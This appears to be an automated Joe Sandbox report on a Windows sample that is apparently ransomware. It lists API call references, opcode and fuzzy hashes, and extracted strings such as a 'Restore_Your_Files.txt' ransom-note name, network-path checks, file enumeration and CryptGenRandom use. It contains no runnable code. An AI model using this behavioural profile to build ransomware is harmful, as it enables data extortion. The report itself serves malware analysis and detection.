                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$Ios_base_dtorstd::ios_base::_
                                          • String ID: &4r*3d$($.PBF$INW15$_Mail-$_[ID-$vj10au=$vj20au=$vj30au=$vj51au=$vj55au=$vjau=$wenf=
                                          • API String ID: 2823994529-2029521403
                                          • Opcode ID: 8c06ab17368e0cf6570ae70cee37d5cb78aa60133232a7f0b939cf5cae974d17
                                          • Instruction ID: 6c281195085ba91d076a78fde27d0381fe6a39d6e56406c2ad9671fe3b9f88f6
                                          • Opcode Fuzzy Hash: 8c06ab17368e0cf6570ae70cee37d5cb78aa60133232a7f0b939cf5cae974d17
                                          • Instruction Fuzzy Hash: E3A2EF30E14258CFDB25CF68CC98BDEB7B2AF85304F10469CD049AB2A1DB75AA85CF51
                                          APIs
                                            • Part of subcall function 009B5130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 009B5198
                                            • Part of subcall function 009B5130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 009B51AC
                                            • Part of subcall function 009B5130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 009B51C0
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009CEEE0
                                          • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,21472377,00000000), ref: 009CEF8B
                                          • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,21472377,00000000), ref: 009CEFA1
                                          • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,21472377,00000000), ref: 009CEFC0
                                          • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,21472377,00000000), ref: 009CEFD7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Path$Network$CreateSemaphore$Ios_base_dtorstd::ios_base::_
                                          • String ID: X$\Restore_Your_Files.txt$w#G!$w#G!
                                          • API String ID: 3524565764-2814613863
                                          • Opcode ID: fef2e90adfd310f38be6006df9a10032ac0e2f3f14e4539930b334122e4171f1
                                          • Instruction ID: af55737962e184e586c93731b7f85e0450a23efbc468311311a0bb6d870153cb
                                          • Opcode Fuzzy Hash: fef2e90adfd310f38be6006df9a10032ac0e2f3f14e4539930b334122e4171f1
                                          • Instruction Fuzzy Hash: 0E72DE71E00298DBDF14DB68CD95BDDBBB5AF45300F1441ADE809A7292DB30AE85CF92
                                          APIs
                                            • Part of subcall function 00A45963: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00A45976
                                          • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00A442E6
                                            • Part of subcall function 00A45A76: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00A45AA0
                                            • Part of subcall function 00A45A76: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00A45B0F
                                          • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00A44418
                                          • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00A44478
                                          • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00A44484
                                          • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00A444BF
                                          • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00A444E0
                                          • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00A444EC
                                          • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00A444F5
                                          • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00A4450D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                          • String ID:
                                          • API String ID: 2508902052-0
                                          • Opcode ID: 6205ff1eeeaee0cf79450def734d6f74160819ef6e24cea2f90ec9e8164c7a4b
                                          • Instruction ID: a9c5ff9c2fc8a1f84c814160dc259c2afbb9c064780e57e830d71add0d637dd0
                                          • Opcode Fuzzy Hash: 6205ff1eeeaee0cf79450def734d6f74160819ef6e24cea2f90ec9e8164c7a4b
                                          • Instruction Fuzzy Hash: 94815B79E006259FCF18DFA9C580A6DBBF1FF88704B1586ADD445AB701C770AD52CB90
                                          APIs
                                          • TlsGetValue.KERNEL32(FFFFFFFF,21472377,?,?,?,?,?,00A90278,000000FF), ref: 00A40315
                                          • TlsSetValue.KERNEL32(FFFFFFFF,?), ref: 00A40359
                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00A90278,000000FF), ref: 00A4037F
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00A90278,000000FF), ref: 00A40386
                                          • GetProcessHeap.KERNEL32(00000000), ref: 00A403C0
                                          • HeapFree.KERNEL32(00000000), ref: 00A403C7
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00A403D0
                                          • HeapFree.KERNEL32(00000000), ref: 00A403D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Heap$FreeProcess$Value
                                          • String ID: w#G!
                                          • API String ID: 3709577838-519468572
                                          • Opcode ID: be252e311a4f3aa944d72ee648230724d26837556da59f2df13a6029cfe9fc8a
                                          • Instruction ID: 0fe2b1816df7b1a845fa8c91f60deecc2542e9fd11a1bb8e1b6f28f361ee2bbd
                                          • Opcode Fuzzy Hash: be252e311a4f3aa944d72ee648230724d26837556da59f2df13a6029cfe9fc8a
                                          • Instruction Fuzzy Hash: 8D414F39600200AFDF20CFA9D889F1B7BA8EF45721F144669FA15DB291D770EC00DA50
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$w#G!
                                          • API String ID: 4168288129-1234829370
                                          • Opcode ID: 62bd50effdff1c253008f1deb5f3ecf5246c84a61ef4a97d5543b63cd0eb2658
                                          • Instruction ID: ad90d9736943a98be0dd7df5084222bcc2a8ec4e119f0980fb50be3f9041a2f1
                                          • Opcode Fuzzy Hash: 62bd50effdff1c253008f1deb5f3ecf5246c84a61ef4a97d5543b63cd0eb2658
                                          • Instruction Fuzzy Hash: 89C23B71E086288FDB65EF28DD407EAB7B9EB44305F1541EAD84DE7240E774AE868F40
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743D9
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743E6
                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00A7EF4E
                                          • IsValidCodePage.KERNEL32(00000000), ref: 00A7EFA9
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00A7EFB8
                                          • GetLocaleInfoW.KERNEL32(?,00001001,00A70C69,00000040,?,00A70D89,00000055,00000000,?,?,00000055,00000000), ref: 00A7F000
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00A70CE9,00000040), ref: 00A7F01F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                          • String ID: w#G!
                                          • API String ID: 745075371-519468572
                                          • Opcode ID: 1853964c95f5b632cad889c37f2c82c9f8cc19f224dbc64979403125130fddb7
                                          • Instruction ID: ac09e85cfbaf5899fa22dd7dd7db29826ae6937c9d8e12125fbddd6b9a3adf27
                                          • Opcode Fuzzy Hash: 1853964c95f5b632cad889c37f2c82c9f8cc19f224dbc64979403125130fddb7
                                          • Instruction Fuzzy Hash: AF514072A00205AFEF20DFA5CC45ABE73B9FF09701F14C5A9F918EB191DB709A408B61
                                          APIs
                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A52DA2
                                            • Part of subcall function 00A4CB06: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00A4CB27
                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00A52E08
                                          • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00A52E20
                                          • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00A52E2D
                                            • Part of subcall function 00A528CD: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00A528F5
                                            • Part of subcall function 00A528CD: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00A5298D
                                            • Part of subcall function 00A528CD: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00A52997
                                            • Part of subcall function 00A528CD: Concurrency::location::_Assign.LIBCMT ref: 00A529CB
                                            • Part of subcall function 00A528CD: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00A529D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                          • String ID:
                                          • API String ID: 2363638799-0
                                          • Opcode ID: a5f5027fc08d596b01e79e437b2b046a6b2fd84e9d9a49452a0576095eddad7d
                                          • Instruction ID: b5ff6f7224b7b791ec93e74f2213f871aa93251687fe9fe85050d944026d28e0
                                          • Opcode Fuzzy Hash: a5f5027fc08d596b01e79e437b2b046a6b2fd84e9d9a49452a0576095eddad7d
                                          • Instruction Fuzzy Hash: 3F518631A00205EBDF18DF50C996BAEBB75BF85711F154069ED027B392CB30AE09CBA1
                                          APIs
                                          • SetErrorMode.KERNEL32(00008003,21472377,00000000,?,00000000), ref: 009C84E3
                                          • FindFirstFileW.KERNEL32(?,?,00AAFB88,00000002,00AAFB84,?,?,?), ref: 009C853F
                                          • SetErrorMode.KERNEL32(00008003,21472377), ref: 009CAF9D
                                          • FindFirstFileW.KERNEL32(?,?,00AAFB88,00000002), ref: 009CAFC5
                                          Similarity
                                          • API ID: ErrorFileFindFirstMode
                                          • String ID: w#G!
                                          • API String ID: 3909587737-519468572
                                          • Opcode ID: 7bd45c90107fe0adae2e53d8d220631d46f2611552c82640fe3d3865bab1b277
                                          • Instruction ID: 9976a24b6a13507900a5b7886d91bb847cce035be22640e778b2795e3e84b867
                                          • Opcode Fuzzy Hash: 7bd45c90107fe0adae2e53d8d220631d46f2611552c82640fe3d3865bab1b277
                                          • Instruction Fuzzy Hash: 2DC1E071A0010A9FCB18DF68CD85FAEB7B5FB84310F10866DF8159B291DB34AA85CF91
                                          APIs
                                          • GetLastError.KERNEL32(00000010,21472377,7508FC30,?), ref: 00A143E0
                                          • CryptReleaseContext.ADVAPI32(00000001,00000000,?,00000000,?,00A962DC,00000002, operation failed with error ,0000001D,?,?,OS_Rng: ,00000008,?), ref: 00A14710
                                          Similarity
                                          • API ID: ContextCryptErrorLastRelease
                                          • String ID: operation failed with error $OS_Rng: $w#G!
                                          • API String ID: 3299239745-2349822220
                                          • Opcode ID: 1bc8d31bb6093ee3f5396a6d99b877acc09385dd67c96bfc518f5dd15df1dfb3
                                          • Instruction ID: 1a3d95304026853a39b1a0bf58cdb6d3e14b199a20e57e9b31da2384abb328d8
                                          • Opcode Fuzzy Hash: 1bc8d31bb6093ee3f5396a6d99b877acc09385dd67c96bfc518f5dd15df1dfb3
                                          • Instruction Fuzzy Hash: ADA1A171A10258DFEB18DF68CD85BDEBBB5FF89304F148258E014AB292DB759AC4CB50
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00A70C70,?,?,?,?,00A706C7,?,00000004), ref: 00A7E5EC
                                          • _wcschr.LIBVCRUNTIME ref: 00A7E67C
                                          • _wcschr.LIBVCRUNTIME ref: 00A7E68A
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00A70C70,00000000,00A70D90), ref: 00A7E72D
                                          Similarity
                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                          • String ID: w#G!
                                          • API String ID: 4212172061-519468572
                                          • Opcode ID: 0981c1fa3c3f52ce787f575b91d08a4c253dc2dbcdaf5127252e621ef828418d
                                          • Instruction ID: 652be89401d43f3a464f8ce1e5ec3af9fbb9438f00b3ce67beb9a813607e8201
                                          • Opcode Fuzzy Hash: 0981c1fa3c3f52ce787f575b91d08a4c253dc2dbcdaf5127252e621ef828418d
                                          • Instruction Fuzzy Hash: 9C61E672600206AADB24EB74CD42FAB77A8EF1C710F14C5A9F90DDB191EB70E94187A0
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00A7EF8D,?,00000000), ref: 00A7ED07
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00A7EF8D,?,00000000), ref: 00A7ED30
                                          • GetACP.KERNEL32(?,?,00A7EF8D,?,00000000), ref: 00A7ED45
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: 474a9d3318931b4b390cd6e327315512dd73bf03a67a30a16e2e18ffd3c005b7
                                          • Instruction ID: a9ecca71df860494783c0d8eea12b48633247cdee70cab37231c6afb3b1c09b1
                                          • Opcode Fuzzy Hash: 474a9d3318931b4b390cd6e327315512dd73bf03a67a30a16e2e18ffd3c005b7
                                          • Instruction Fuzzy Hash: 0821C136B00100AADB35CF65CC00A9777A7EF69B10B66C4E4E90ECB111E732DE41C390
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743D9
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743E6
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7E949
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7E99A
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7EA5A
                                          Similarity
                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                          • String ID: w#G!
                                          • API String ID: 2829624132-519468572
                                          • Opcode ID: 07a0953c04831360e7da533a7991519db708c54846a0bed4a2ea18550ec87186
                                          • Instruction ID: abd9614db1a902740eeebf1a939b5ba9318d5ca271dc29df61f11595eff47cd6
                                          • Opcode Fuzzy Hash: 07a0953c04831360e7da533a7991519db708c54846a0bed4a2ea18550ec87186
                                          • Instruction Fuzzy Hash: E861A0715102079BEB28DF24CD82BBA77A8FF48341F10C1F9E90ADA195E774E981CB54
                                          APIs
                                          • CreateFileW.KERNEL32(00A3CC7E,00000008,00000007,00000000,00000003,02200000,00000000,21472377,?,00000000,?,00A3CC7E,?), ref: 00A3C8A3
                                          • DeviceIoControl.KERNEL32(00000000,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 00A3C8EA
                                          • CloseHandle.KERNEL32(00000000), ref: 00A3C924
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle
                                          • String ID: w#G!
                                          • API String ID: 33631002-519468572
                                          • Opcode ID: eca8fc2b6b59f7c4033e724dae925dae2f8ae1b5c8f23abd2a7e99109f7e78a4
                                          • Instruction ID: 95275d6323d2cab90e144f6d1c07d91e8ebdb30a0c4e57d194d04e51a472a234
                                          • Opcode Fuzzy Hash: eca8fc2b6b59f7c4033e724dae925dae2f8ae1b5c8f23abd2a7e99109f7e78a4
                                          • Instruction Fuzzy Hash: 2021C971B84204FFEB20CB68DC46F9AB7B8EB41720F204226FA55B72D0D7749A04D755
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00A65050
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A6505A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00A65067
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID: w#G!
                                          • API String ID: 3906539128-519468572
                                          • Opcode ID: 7d7ebd60feec90fe8a415724963aa6205f1f9f38d609316941c9c623947a4c4d
                                          • Instruction ID: 722fd6f0d2a52d95cc0dc85c356d6e138a45a8e8f2bf2a57e45fd284f280762c
                                          • Opcode Fuzzy Hash: 7d7ebd60feec90fe8a415724963aa6205f1f9f38d609316941c9c623947a4c4d
                                          • Instruction Fuzzy Hash: 3E31D675901218ABCB21DF64DD88BDDBBB8BF08310F5042DAE91CA7250EB709F858F45
                                          APIs
                                            • Part of subcall function 00A147F0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A1487A
                                          • CryptGenRandom.ADVAPI32(00000000,?,?,21472377), ref: 00A1479A
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A147E9
                                          Similarity
                                          • API ID: Crypt$ContextException@8RandomReleaseThrow
                                          • String ID: CryptGenRandom$w#G!
                                          • API String ID: 1047471967-1156935335
                                          • Opcode ID: 1ac414dfc9be06289f95fc1a54846b5869adf8ec5731311efc65b487877b83a3
                                          • Instruction ID: 82d14e4d5c641ae411e4853386a01731dec34c0f10d7369ddd81849d1661e331
                                          • Opcode Fuzzy Hash: 1ac414dfc9be06289f95fc1a54846b5869adf8ec5731311efc65b487877b83a3
                                          • Instruction Fuzzy Hash: AC014071904248AFCB15EF94DD41FEEBBB8FF09710F40456AE912AB290DF746908CB90
                                          Similarity
                                          • API ID: __onexit
                                          • String ID: Dflt$Dflt$Dflt$Dflt$w#G!
                                          • API String ID: 1448380652-4237716125
                                          • Opcode ID: aa401cd8f66066315f62c6f0a8073c165064e23514ec4732aa1403a9455110be
                                          • Instruction ID: 61cf832efdf7861fab391c5457799f418224788348873de5441b151f405c4f3f
                                          • Opcode Fuzzy Hash: aa401cd8f66066315f62c6f0a8073c165064e23514ec4732aa1403a9455110be
                                          • Instruction Fuzzy Hash: 92114CB4946744EFE301CFD0ED1AF5A7BA0F305708F00861AE6461B7E0C7BA150ACB95
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00A706C7,?,00000004), ref: 00A7316D
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: GetLocaleInfoEx$w#G!
                                          • API String ID: 2299586839-3948657542
                                          • Opcode ID: 108c7d433230e2175e30f633d09b05eb610f6b915f44fcb2d9c90dc4924bfc1c
                                          • Instruction ID: 2bc8d969eabc0bb10301bd3cc3b368f135a9a4ce92beea2af17c00e101a961b8
                                          • Opcode Fuzzy Hash: 108c7d433230e2175e30f633d09b05eb610f6b915f44fcb2d9c90dc4924bfc1c
                                          • Instruction Fuzzy Hash: 72F06233740208BBCF01AFA5DC01E6E7B65EB04711F418555FD0956250DA719F21A695
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A731C3
                                          Similarity
                                          • API ID: Time$FileSystem
                                          • String ID: GetSystemTimePreciseAsFileTime$w#G!
                                          • API String ID: 2086374402-4205190955
                                          • Opcode ID: e49566bf10b144e3aadcdc4062f410b50958bdcb0c0342b2a36582d9e75ad6d6
                                          • Instruction ID: 943bf7963bdec2e601138467432b14fbd4a56728e708d332aa8697fe2b73cbae
                                          • Opcode Fuzzy Hash: e49566bf10b144e3aadcdc4062f410b50958bdcb0c0342b2a36582d9e75ad6d6
                                          • Instruction Fuzzy Hash: 06E0E533B40318BF8E10AF509C02E3E7BA0EB44B10B56866AF80A9B280DE615F01A6C5
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,00A60E4F,?,00ACC9F0,0000000C,00A60FA6,?,00000002,00000000), ref: 00A60E9A
                                          • TerminateProcess.KERNEL32(00000000,?,00A60E4F,?,00ACC9F0,0000000C,00A60FA6,?,00000002,00000000), ref: 00A60EA1
                                          • ExitProcess.KERNEL32 ref: 00A60EB3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 1f564ae04cf523cae5620e07debc2bb9173f7e225e31cfad0c49284547081bea
                                          • Instruction ID: 23f78bcae4b4cdae145dd5da56dc6723f277e88eb12fd75e0db3cd5bf0f54bfd
                                          • Opcode Fuzzy Hash: 1f564ae04cf523cae5620e07debc2bb9173f7e225e31cfad0c49284547081bea
                                          • Instruction Fuzzy Hash: A3E0B632140558AFCF11EFA4DE09E9A3B79EF54752F044819F9898B531CF36EE82DA40
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743D9
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743E6
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7EB99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
